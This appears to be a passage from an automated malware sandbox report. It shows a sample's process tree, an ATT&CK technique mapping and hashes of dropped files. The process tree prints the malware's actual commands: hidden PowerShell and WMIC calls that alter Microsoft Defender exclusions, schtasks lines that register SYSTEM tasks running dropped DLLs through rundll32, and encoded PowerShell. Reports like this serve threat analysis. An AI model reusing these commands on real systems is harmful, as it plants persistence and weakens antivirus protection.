C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:1244
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2464
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RNplELueU\RDwpyC.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wgFtIVrBuHdIdLf" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2796
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wgFtIVrBuHdIdLf2" /F /xml "C:\Program Files (x86)\RNplELueU\QhBwWFM.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "wgFtIVrBuHdIdLf"3⤵PID:2828
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wgFtIVrBuHdIdLf"3⤵PID:2528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tIlFGqArMHXptH" /F /xml "C:\Program Files (x86)\nWWVEJXizSHU2\gxkBXHV.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IkBmJZAegNpZy2" /F /xml "C:\ProgramData\evUSZSaqPkAEukVB\AwbrQqt.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PAxmAUNtgsWrISWfx2" /F /xml "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\aLiRbjg.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OurksSTJxLQIbfTMDbR2" /F /xml "C:\Program Files (x86)\fLdzueVMGzfAC\ifyJsaU.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vczjtXgpVbXDKOBgh" /SC once /ST 09:18:36 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\XwIFwyvoUqntekhn\ByEsLIKE\lecSxzE.dll\",#1 /ozdidFlCd 385137" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vczjtXgpVbXDKOBgh"3⤵PID:2000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QVuDljbAZykxnpoWI"3⤵PID:648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 15483⤵
- Loads dropped DLL
- Program crash
PID:1884
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\XwIFwyvoUqntekhn\ByEsLIKE\lecSxzE.dll",#1 /ozdidFlCd 3851372⤵PID:2772
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\XwIFwyvoUqntekhn\ByEsLIKE\lecSxzE.dll",#1 /ozdidFlCd 3851373⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3056 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vczjtXgpVbXDKOBgh"4⤵PID:2272
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6B249E81-3577-4DB7-A6E2-AF8D23D33C2E} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2988
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:928 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:684
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2852
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:692
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:972
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2652
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5398948e0699401bf78766f0c47f0e23b
SHA1a61d7ed422f24d97bba32eb6749dc536c05fddd1
SHA2562b3e9a03086b25f9dd5a1dac2306e85a9686c199f6ab549c13680946799ea64a
SHA512e8cc6beec96fb623772569333d0cd2437762abec5551fc9d62ec476dfdd81ffb712b5e46d62c12bae94a861a6ecaf778bc17ba6ff41d9226dfac7f266d4be264
-
Filesize
2KB
MD5f746e73a867e67d171bbe94d4ef2b43e
SHA1321b8e0ef3e5fbb9a1ad637ded9da7e29b0b5a38
SHA256d5b06622a8264ce17d67e877dea4d558ebef03ae62efd74b25c5e2ef9ccaa072
SHA5120c918ab1c268e14353ad37029e012e590390d6413e18127d57d7323bbb09de28298012bc32a2dc1bfc673e2cc59dc1c09aef4aab094661a595395d0da4046ab6
-
Filesize
2KB
MD59e893bc0aacac8efa1e6d3ae077ca621
SHA1012d402bf618850a7a2e0b8dc2c078eac12528b4
SHA256e5c4900bb4be48eddb9dda50da70b1908008c5383036efdb51156873892f3b39
SHA512d56f7fbbd04c6b3f5af3c2040873609819680fd2224ba8579de795cf62398aaf6cc8af6cf7df4976111c187f43ac21a9d2c095d7fc23cefdbe85371c09308779
-
Filesize
2KB
MD54f7235c5140afdb7a8819d9d6327e216
SHA123706c263e5a4e5d26f0664ae401f0881c0dea13
SHA25619c5f2c35b8e15798009322f37ffe68f7f2240b8e6f3207b1e3490542ba2c731
SHA512456ff4bf4227b9f452222496b6a768dc8a606c736e7c45ce52fa5405564b407046da996bcc468be9deccc2ceb5ebafa1b7d6b087d0271edc8a06ce4b3d25b088
-
Filesize
2.5MB
MD500c0f378e09e976613ef985519794d20
SHA184432a435926a381f35c8bf9574f6fcae2958283
SHA2564d6b3bff9abea5f59934bef14afb2743166666a513daf7e26784fbb0245a4bbb
SHA51233be7a93a091d7d0017a3958f29af364aed9472123d8b8a092ea5096538dd9f408874bfb670de18c326fa5850f1202d7b797744d9da3a5ba2d4db63d19d7be9c
-
Filesize
2KB
MD5500723b75fb7dd3fa0653c890c3ece65
SHA1e7584f021be974f527f83648f634cf50698f9341
SHA256bf366c18c3461c02508a20815a2e3968fb3ce76f5b947a9eb3a7fc12a6bd58ee
SHA512855a21003ee36e3f2f7eab55400af451bd426534574b1d3f0a7f23ef231c2a6b581453fc555356ada47cf4dd5024a6c10353ca633ad58a2bd76ccdc90a51cffd
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD55b83e7e908b0ffe9becda99c34e1b7b8
SHA13f1f831ebb6679c681cd41b4d07db02cdafe3d1b
SHA25689dba3e125e61014ff07ecb0e49c1b92524938d816e909087336e6231dd727ad
SHA5120c8bb614710f8c89a0573575242244f008197d66c9fa44c5a9d95d8575c529581fc2acc95c2cd44ca1e1a701b6b724291c0b1acf7fda118b1349a15f952f5b80
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58d890d2828515c1eb0b957945cba683a
SHA1a6244224a119ce6083a3c279132897d885b5a90d
SHA256db83a5bb456bcabaf625589460fa84629cab054f5724bae1964aadee7edc8788
SHA512d8f03ac9e9e5e3138c72fa68500de73560222bbf49e5a65da0bd2ee5defe6b4806dd008c4a2ea3c573bf1935965b97c43cd17fd7c025c1eaa0831fee5942a4c6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KY7U0NLLFLB1Z4ZH82R8.temp
Filesize7KB
MD59c7365be103d76870a79310bf98bb45b
SHA14d0e9eb4869cc932777d0e4fbbee91404359bafb
SHA256d9ca6daa59559edaa2b5b81a2c648013336d7d1795a5adabfb9a4bbbff4ef540
SHA5121e951a977b4b09b381501a34fe10a27e48ce367b1ebc99c560f855e74ba3001b1c33a0d7a19944535cc85181d5df2f82a1400931a2980c6609e7bd1386a788d7
-
Filesize
7KB
MD5900943415af959cee8aa2fb805dc7f79
SHA1c7f0a11c89c79f85af00751401a4b4292991a8dd
SHA2562c4c2b23fc6337e52004175088d9c947edaf0d29b875f03b7fb0910051a0392d
SHA512ca5e848d623c44e20c1b1f4e2f5c77dfa06fabac72091d10901a70b327dd2b0f7279177b053243f18034a5550c26835c7dbd0bdf9962f20b51fef8f852618c95
-
Filesize
6.4MB
MD5d9a4c2736e6e08c43cf77d61d5b8f87c
SHA1e2fa6783deb4f4bd3c4b758ba7c0f419abfab430
SHA2566e6f7797071baa57831bb69a84f82950630c1bc252238b6e8b879cb6a02a1bf4
SHA512df4b4687a09c4065ed13931d069bf0e7b514b8812e1c7669f1813339118014a51a0f7dd0068e923c5edcfe8e175cda04c496cb34d5648d8dc577ebff49f526b0
-
Filesize
9KB
MD544a96b12a994ff11935a031197ca1cba
SHA1c9f9cc24d8e1bea0a9079fe86115c7fadf2f128d
SHA25682c3be02370d181d3bfbca68f0a9e026b24892c205dfa06d3f2155fe29566b96
SHA512b03db4f672cd9913ea424ad59e69274ac9ccaf4a75c1fbc7f4488305f501f923e14d12be57ba7d3b1a4de2960a280ce2087dd66e22178c50fd88156be12a8e27
-
Filesize
5KB
MD55fb6ae8dd5b6902e32ddd72b5fbd38d0
SHA1b131b56c7c4615294f4a5d01be8f17d75d1755ec
SHA2560994c524a8dd07083ec0eec70a3e1ce6c4079cf06484e87a89353e6d203b4dc3
SHA512d6884bfcc10898132cd0f223f9484923a0aadbba19a885af39642d62a952165dc35d588b63e64f120b39a3524ead6279245af7029d68f5a7afbfb416bd5dd8a7
-
Filesize
6.4MB
MD5dbefbc71c64bddd4e1c16a51137a9c4b
SHA101f8007bbb4795adf72b1082cf5db7e9070ba412
SHA25637eae6dbe7087b544cfd89ba476bf0e18b884608b18b9ba94d0dbadea2c4a543
SHA512e29b01ba923cf515893f7f311b3191f1758931609a72b0cd93e0ceb815539aabacc92024eaf35c6c9ce2384317701cf1f222e8cfd8a712ce3b1c90ea3cb8c7bf
-
Filesize
6.7MB
MD57d81480dc33ed5603a660ab787ba942b
SHA104e0360d151b0c30778f3f747d43bd80785310a3
SHA256a63e0ec7bf6eee3581885b2d8e0a4b9fc33922c734591704925f15ffc2f257c4
SHA512834cfae4be9f95429ce40ef492a6089766c0e8b39748a8ef905d25785693947a4aaa1dd6c18a3d0698b278f7aef5159955b86e091f8cff8b95883679ad303bbf